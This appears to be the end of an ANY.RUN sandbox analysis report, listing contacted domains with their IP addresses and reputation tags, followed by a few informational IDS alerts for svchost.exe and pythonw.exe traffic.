whitelisted
linked-on.com
  • 188.114.96.3
  • 188.114.97.3
unknown
dmtn-tv.net
  • 170.130.165.109
unknown
www.bing.com
  • 2.16.204.153
  • 2.16.204.150
  • 2.16.204.148
  • 2.16.204.141
  • 2.16.204.145
  • 2.16.204.160
  • 2.16.204.142
  • 2.16.204.151
  • 2.16.204.147
whitelisted
crl.microsoft.com
  • 2.16.164.120
  • 2.16.164.49
  • 2.16.164.72
whitelisted
www.microsoft.com
  • 23.59.18.102
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
8140
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
5520
pythonw.exe
Misc activity
ET INFO Observed ZeroSSL SSL/TLS Certificate
5520
pythonw.exe
Not Suspicious Traffic
INFO [ANY.RUN] Websocket Upgrade Request
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
dummy.txt